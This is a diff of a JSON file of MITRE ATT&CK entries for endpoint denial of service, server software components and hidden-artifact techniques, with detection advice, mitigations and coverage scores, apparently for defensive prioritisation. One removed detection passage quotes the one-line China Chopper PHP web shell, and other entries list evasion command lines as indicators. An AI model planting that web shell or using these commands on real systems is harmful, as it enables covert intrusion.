-            "SC-7",
-            "SI-10",
-            "SI-15"
+            "SI-4"
         ],
-        "process_coverage": false,
-        "network_coverage": true,
-        "file_coverage": false,
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.12380952380952381,
-            "mitigation_score": 0.16363636363636364,
-            "detection_score": 0.08
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1499",
-        "name": "Endpoint Denial of Service",
-        "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nIn cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\n\nFor attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\n",
-        "url": "https://attack.mitre.org/techniques/T1499",
+        "tid": "T1564.003",
+        "name": "Hide Artifacts: Hidden Window",
+        "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nOn Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)",
+        "url": "https://attack.mitre.org/techniques/T1564/003",
         "tactics": [
-            "Impact"
+            "Defense Evasion"
         ],
-        "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
+        "detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.",
         "platforms": [
-            "Azure AD",
-            "Containers",
-            "Google Workspace",
-            "IaaS",
-            "Linux",
-            "Office 365",
-            "SaaS",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow",
-            "Sensor Health: Host Status"
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Script: Script Execution"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1499.001",
-                "name": "Endpoint Denial of Service: OS Exhaustion Flood",
-                "url": "https://attack.mitre.org/techniques/T1499/001",
-                "description": "Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.\n\nDifferent ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\n\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)",
-                "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.",
-                "mitigations": [
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    }
-                ]
-            },
-            {
-                "tid": "T1499.002",
-                "name": "Endpoint Denial of Service: Service Exhaustion Flood",
-                "url": "https://attack.mitre.org/techniques/T1499/002",
-                "description": "Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\nOne example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)\n\nAnother variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)",
-                "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
-                "mitigations": [
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    }
-                ]
-            },
-            {
-                "tid": "T1499.003",
-                "name": "Endpoint Denial of Service: Application Exhaustion Flood",
-                "url": "https://attack.mitre.org/techniques/T1499/003",
-                "description": "Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)",
-                "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.",
-                "mitigations": [
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1564",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1499.004",
-                "name": "Endpoint Denial of Service: Application or System Exploitation",
-                "url": "https://attack.mitre.org/techniques/T1499/004",
-                "description": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.",
-                "detection": "Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.",
-                "mitigations": [
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    }
-                ]
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
             }
         ],
+        "cumulative_score": 0.24761904761904763,
+        "adjusted_score": 0.24761904761904763,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.5"
+        ],
+        "nist_controls": [
+            "CM-7",
+            "SI-10",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1564.004",
+        "name": "Hide Artifacts: NTFS File Attributes",
+        "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)",
+        "url": "https://attack.mitre.org/techniques/T1564/004",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Metadata",
+            "File: File Modification",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1564",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             }
         ],
-        "cumulative_score": 0.17857142857142855,
-        "adjusted_score": 0.17857142857142855,
+        "cumulative_score": 0.20476190476190478,
+        "adjusted_score": 0.20476190476190478,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "4.2",
-            "7.6",
-            "7.7"
+            "3.3",
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8"
         ],
         "nist_controls": [
+            "AC-16",
             "AC-3",
-            "AC-4",
             "CA-7",
-            "CM-6",
-            "CM-7",
-            "SC-7",
-            "SI-10",
-            "SI-15",
-            "SI-4"
+            "SI-3",
+            "SI-4",
+            "SI-7"
         ],
-        "process_coverage": false,
-        "network_coverage": true,
+        "process_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.12857142857142856,
-            "mitigation_score": 0.21818181818181817,
-            "detection_score": 0.03
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1505",
-        "name": "Server Software Component",
-        "description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.",
-        "url": "https://attack.mitre.org/techniques/T1505",
+        "tid": "T1564.005",
+        "name": "Hide Artifacts: Hidden File System",
+        "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)",
+        "url": "https://attack.mitre.org/techniques/T1564/005",
         "tactics": [
-            "Persistence"
+            "Defense Evasion"
         ],
-        "detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.\n\nProcess monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ",
+        "detection": "Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "File: File Creation",
             "File: File Modification",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow",
-            "Process: Process Creation"
+            "Firmware: Firmware Modification",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1505.001",
-                "name": "Server Software Component: SQL Stored Procedures",
-                "url": "https://attack.mitre.org/techniques/T1505/001",
-                "description": "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).\n\nAdversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) \n\nMicrosoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) ",
-                "detection": "On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1045",
-                        "name": "Code Signing",
-                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                        "url": "https://attack.mitre.org/mitigations/M1045"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
-            {
-                "tid": "T1505.002",
-                "name": "Server Software Component: Transport Agent",
-                "url": "https://attack.mitre.org/techniques/T1505/002",
-                "description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ",
-                "detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1045",
-                        "name": "Code Signing",
-                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                        "url": "https://attack.mitre.org/mitigations/M1045"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
-            {
-                "tid": "T1505.003",
-                "name": "Server Software Component: Web Shell",
-                "url": "https://attack.mitre.org/techniques/T1505/003",
-                "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) ",
-                "detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\n\nFile monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)\n\nLog authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1505.004",
-                "name": "Server Software Component: IIS Components",
-                "url": "https://attack.mitre.org/techniques/T1505/004",
-                "description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)\n\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)\n\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)",
-                "detection": "Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\\system32\\inetsrv\\config\\applicationhost.config could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)\n\nMonitor execution and command-line arguments of AppCmd.exe, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1045",
-                        "name": "Code Signing",
-                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                        "url": "https://attack.mitre.org/mitigations/M1045"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            }
+        "is_subtechnique": true,
+        "supertechnique": "T1564",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1564.006",
+        "name": "Hide Artifacts: Run Virtual Instance",
+        "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)",
+        "url": "https://attack.mitre.org/techniques/T1564/006",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.\n\nConsider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. -silent, -ignore-reboot), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. VBoxManage startvm $VM --type headless).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. VBoxManage.exe setextradata global GUI/SuppressMessages \"all\").\n\nMonitor for commands which enable hypervisors such as Hyper-V.  If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \n\nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "Process: Process Creation",
+            "Service: Service Creation",
+            "Windows Registry: Windows Registry Key Modification"
         ],
+        "is_subtechnique": true,
